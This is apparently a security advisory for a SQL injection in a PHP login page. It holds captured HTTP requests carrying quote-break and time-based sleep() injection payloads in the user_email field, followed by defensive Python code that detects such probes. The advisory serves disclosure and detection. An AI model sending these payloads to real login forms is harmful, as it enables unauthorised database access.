MySQL Request-1:
POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

user_email=IlZWXHcK@nu11secur1tycollaborator.net'&user_pass=m2G%21b5m%21D8&btnLogin=%C2%9E%C3%A9e
MySQL Response-1:
HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:37 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 7099
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Bootstrap core CSS -->
<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...
<b>Fatal error</b>: Uncaught Error: Call to undefined function mysql_error() in C:\xampp\htdocs\caiwl\include\accounts.php:28
Stack trace:
#0 C:\xampp\htdocs\caiwl\admin\login.php(165): User::userAuthentication('IlZWXHcK@burpco...', '0314337dea4e6aa...')
#1 {main}
thrown in <b>
...[SNIP]...
MySQL Request-2:
POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

user_email=ICpueGIm@nu11secur1tycollaborator.net''&user_pass=g1M%21g9l%21F1&btnLogin=%C2%9E%C3%A9e
MySQL Response-2:
HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:40 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6832
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Bootstrap core CSS -->
<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...
MySQL Request-3:
POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

user_email=QXVzAYzI@nu11secur1tycollaborator.net'%2b(select*from(select(sleep(20)))a)%2b'&user_pass=u0U%21y2z%21D9&btnLogin=%C2%9E%C3%A9e
MySQL Response-3:
HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:51 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6811
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- Bootstrap core CSS -->
<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...
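The three captures above form a classic differential probe against the user_email field: a lone single quote breaks the query and the application answers with a PHP fatal error that leaks the install path (the call to mysql_error() fails because the mysql_* extension no longer exists on the PHP 7.4.24 shown in the Server header, so the legacy error path itself crashes), a doubled quote yields the normal login page, and a concatenated subselect calling sleep() is answered 11 seconds after the previous response. As a defender-side illustration, and as an added example that is not part of the original advisory, the Python below feeds the same three form bodies and response Date headers through a small detector that flags unbalanced or doubled quotes, subselects and time-delay functions per form field, and marks any response whose spacing from the previous one exceeds a threshold. The regular expressions, the 5-second threshold and the function names are assumptions; the Date-header gap is only a coarse proxy for server-side delay because it also contains the client's own pause between requests.

```python
import re
from email.utils import parsedate_to_datetime
from urllib.parse import parse_qs

# Constructed sample input: the three POST bodies and the Date header of the
# response each one received, copied from the captures in this advisory.
SAMPLES = [
    ("user_email=IlZWXHcK@nu11secur1tycollaborator.net'&user_pass=m2G%21b5m%21D8&btnLogin=%C2%9E%C3%A9e",
     "Mon, 18 Oct 2021 07:42:37 GMT"),
    ("user_email=ICpueGIm@nu11secur1tycollaborator.net''&user_pass=g1M%21g9l%21F1&btnLogin=%C2%9E%C3%A9e",
     "Mon, 18 Oct 2021 07:42:40 GMT"),
    ("user_email=QXVzAYzI@nu11secur1tycollaborator.net'%2b(select*from(select(sleep(20)))a)%2b'&user_pass=u0U%21y2z%21D9&btnLogin=%C2%9E%C3%A9e",
     "Mon, 18 Oct 2021 07:42:51 GMT"),
]

# Assumed patterns: time-delay functions and a parenthesised subselect are what
# a blind, time-based probe relies on; an odd number of single quotes is the
# syntax-break probe that produced the fatal error in the first capture.
TIME_FUNCS = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\b", re.I)
SUBSELECT = re.compile(r"\(\s*select\b", re.I)


def decode_form(body):
    """Decode an application/x-www-form-urlencoded body into {field: value}.

    parse_qs percent-decodes values, so the %2b in the third capture becomes
    the '+' string-concatenation operator the payload actually relies on.
    """
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def indicators(value):
    """Return the SQL-injection indicators found in one decoded field value."""
    found = []
    if value.count("'") % 2 == 1:
        found.append("unbalanced_quote")
    if "''" in value:
        found.append("doubled_quote")
    if SUBSELECT.search(value):
        found.append("subselect")
    if TIME_FUNCS.search(value):
        found.append("time_delay")
    return found


def classify_body(body):
    """Map each form field that carries indicators to the list of indicators."""
    result = {}
    for field, value in decode_form(body).items():
        hits = indicators(value)
        if hits:
            result[field] = hits
    return result


def slow_responses(date_headers, threshold_s=5.0):
    """Indexes of responses whose gap from the previous response exceeds threshold_s.

    Heuristic only: the Date header is stamped when the server builds the
    response, so the gap also includes the client's pause between requests.
    """
    stamps = [parsedate_to_datetime(d) for d in date_headers]
    return [i for i in range(1, len(stamps))
            if (stamps[i] - stamps[i - 1]).total_seconds() > threshold_s]


def analyse(samples=SAMPLES):
    """Run both checks over (body, date) pairs and return the findings."""
    findings = [classify_body(body) for body, _ in samples]
    slow = slow_responses([date for _, date in samples])
    return findings, slow


if __name__ == "__main__":
    findings, slow = analyse()
    for i, f in enumerate(findings, 1):
        print(f"request {i}: {f or 'no indicators'}")
    print("responses delayed past threshold:", [i + 1 for i in slow])
```

Run stand-alone it reports the quote probe on request 1, the doubled quote on request 2, the subselect plus sleep() on request 3, and response 3 as the delayed one. In practice the same two checks belong in a WAF rule or a log-pipeline enrichment keyed on the login endpoint, with the timing check computed from the server's own request-duration field rather than from Date headers.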
Reproduce
NOTE:
The PoC will be encrypted, sorry about this dear friends!
If someone wants to see this work, please write me!
KR @nu11secur1ty
Proof: